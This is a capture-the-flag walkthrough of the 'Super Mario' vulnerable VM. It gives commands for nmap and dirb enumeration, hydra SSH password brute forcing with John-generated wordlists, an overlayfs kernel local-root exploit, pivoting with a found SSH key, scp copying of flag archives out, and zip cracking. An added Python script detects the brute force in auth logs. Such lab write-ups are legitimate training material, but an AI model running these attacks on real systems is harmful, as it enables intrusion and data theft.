Hello friends!! You have probably played the SUPER MARIO game once in your childhood, and no wonder if the thought of hacking the game once struck your mind. Whatever you had thought, today we are going to make it true, and for that you need to download the new Super Mario VM from here.
The credit for developing this VM goes to Mr_h4sh, who has hidden 2 flags inside this lab as a challenge for hackers. The level of the challenge is Intermediate.
Let's breach!!!
As you know we always start with enumeration, therefore open the terminal in your Kali Linux and go for an aggressive scan with nmap.
nmap -p- -A 192.168.0.5
Since port 22 and port 8180 are open for the services SSH and HTTP respectively, I chose port 8180 for enumeration, but from the screenshot you can see I didn't get any remarkable result.
dirb http://192.168.0.5:8180
Then I moved on to a directory brute-force attack using the following command with a bigger wordlist:
dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt
In the screenshot given below you can see it has found a file named vhosts; let's explore it through the browser.
Now open vhosts in the URL as http://192.168.0.5:8180/vhosts. Here vhosts stands for virtual host, a method for hosting multiple domains on a single server. From inside vhosts I came to know the ServerName is mario.supermariohost.local.
Let's add mario.supermariohost.local to /etc/hosts as a new local hostname.
cd /etc
vim hosts
Now type "192.168.0.5 mario.supermariohost.local" inside the vim editor to add it to /etc/hosts, and then type :wq to save it.
Now type cat hosts to check the added host name. From the screenshot you can see it has been added successfully.
Then I visited mario.supermariohost.local in the browser and finally got Mario as a browser game, but it is not working.
Since we know ports 22 and 8180 were open and we didn't get much information from enumeration of port 8180, we will now move towards port 22 for SSH enumeration; therefore I prepared a dictionary in order to retrieve credentials to log in to the SSH server.
The dictionary contains usernames that are famous characters of MARIO; you can check these names from Google as well.
Inside a text editor type the following names, one per line: mario, luigi, peach, toad, yoshi, and save the file as user on the desktop.
Use John the Ripper to generate a dictionary of passwords using the following command; here --rules applies John's word-mangling rules to the wordlist and --stdout writes the generated candidates to standard output, which we redirect into a file named pass on the desktop.
john --wordlist=user --rules --stdout > pass
Finally we have the username dictionary user and the password dictionary generated by john as pass; now we have to find the matching combination of user and pass in order to retrieve credentials for SSH login. I chose hydra for password cracking; you can choose any other password cracking tool as well.
hydra -L user -P pass 192.168.0.5 ssh
From the given screenshot you can read the matched combination of username: luigi and password: luigi1 for the SSH server.
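Seen from the server side, the hydra run above leaves a burst of failed sshd logins from one source followed by a success. As an added example (not part of the original post), the script below counts failed password attempts per source IP in sshd auth.log lines and escalates when the same source then logs in; the log lines are constructed samples, and the threshold of five is an assumption.

```python
# Added example (not from the original post): spot a hydra-style SSH password
# attack from the defender's side by counting failed logins per source IP in
# sshd auth.log lines. The log excerpt below is a constructed sample.
import re
from collections import defaultdict

# Constructed sample: five failures then one success from one host, plus an
# unrelated key-based login from another host.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:01 supermariohost sshd[1201]: Failed password for invalid user mario from 192.168.0.6 port 40210 ssh2
Mar  3 10:01:02 supermariohost sshd[1202]: Failed password for luigi from 192.168.0.6 port 40211 ssh2
Mar  3 10:01:02 supermariohost sshd[1203]: Failed password for invalid user peach from 192.168.0.6 port 40212 ssh2
Mar  3 10:01:03 supermariohost sshd[1204]: Failed password for invalid user toad from 192.168.0.6 port 40213 ssh2
Mar  3 10:01:03 supermariohost sshd[1205]: Failed password for invalid user yoshi from 192.168.0.6 port 40214 ssh2
Mar  3 10:01:04 supermariohost sshd[1206]: Accepted password for luigi from 192.168.0.6 port 40215 ssh2
Mar  3 10:05:00 supermariohost sshd[1300]: Accepted publickey for admin from 192.168.0.9 port 50001 ssh2
"""

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port")

def analyse_auth_log(text, threshold=5):
    """Return one alert per source IP with at least `threshold` failed password
    attempts; severity is raised to high if that source later logged in
    (the luigi/luigi1 outcome reached above). Threshold is an assumed value."""
    failures = defaultdict(list)    # src_ip -> usernames tried
    successes = defaultdict(list)   # src_ip -> (auth method, user) pairs
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)].append(m.group(1))
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            successes[m.group(3)].append((m.group(1), m.group(2)))
    alerts = []
    for src, users in failures.items():
        if len(users) >= threshold:
            alerts.append({"src": src, "failures": len(users),
                           "distinct_users": len(set(users)),
                           "severity": "high" if successes.get(src) else "medium",
                           "logged_in_as": [u for _, u in successes.get(src, [])]})
    return alerts

if __name__ == "__main__":
    for alert in analyse_auth_log(SAMPLE_AUTH_LOG):
        print(alert)
```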
Now type the following for SSH login:
ssh luigi@192.168.0.5
Password: luigi1
Yeeppiii!!!! Finally we have logged in to the SSH server.
uname -a
Here we come to know that the kernel version of linux supermariohost is 3.13.0; let's check for its exploit on Google.
Yes, there is an exploit for 3.13.0 (overlayfs local root in Ubuntu); download it from here inside your Kali Linux.
From the screenshot you can see I have downloaded the exploit as Mario.c for privilege escalation.
Now type the following command to download Mario.c inside the target system.
The file is successfully downloaded inside it; now type another command to compile Mario.c:
gcc Mario.c -o mario
./mario
id
cd /root
ls
Awesome!!! We have got root privileges, and from the screenshot you can see inside its directory I have got a zip file as flag.zip.
Now type the following command to download flag.zip onto the desktop of your Kali Linux:
scp /root/flag.zip root@192.168.0.6:/root/Desktop
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u flag.zip
As shown in the given screenshot PASSWORD FOUND!!! : pw == ilovepeach; now you can unzip your file using this password.
unzip flag.zip
It will ask for a password; give the above password to unzip it, and again if you notice the given image it contains flag.txt.
cat flag.txt
1st FLAG: Well done :D If you reached this it means you got root, congratulations.
Now follow the steps given below in order to complete the other challenge.
iptables -L
Here from the screenshot you can see a new network has been added on the remote system.
arp -n
Now the target system reveals another host at the IP 192.168.122.112.
ls -la
Found a directory .bak
cd /.bak
ls
cd users
cd luigi
ls
There are two files inside it; let's read them one by one.
cat message
Hi Luigi,
Since you've been messing around with my host, at this
point I want to return the favour.
This is a "war", you "naughty" boy!
cat id_rsa.pub
The highlighted word in the given text may appear like a username for logging in to the SSH server.
Let's make sure by logging in: ssh -i id_rsa warluigi@192.168.122.112
Great!! All assumptions have given a positive result.
Again check the kernel version:
uname -a
Woooww!! It is the same version, so now we can use our Mario.c exploit for root privileges. Hence repeat the above steps as shown in the images.
The file is successfully downloaded inside it; now type another command to compile Mario.c:
gcc Mario.c -o mario
./mario
id
cd /root
ls -la
Here I found two important files: 1st hint.txt, 2nd flag2.zip. Before going to unzip flag2.zip we must look at the hint.txt file.
cat .hint.txt
"Peach Loves Me"
It might be the password key for decrypting the flag2.zip file.
Now let's download flag2.zip onto the desktop of Kali Linux by using the following command again:
scp /root/flag2.zip root@192.168.0.6:/root/Desktop
unzip flag2.zip
Now when it asks for the password key, type "Peach Loves Me".
It contains flag2.txt inside; type cat flag2.txt to open this file.
2nd FLAG: Congratulations on your second flag!
Wonderful!!! We have caught both flags.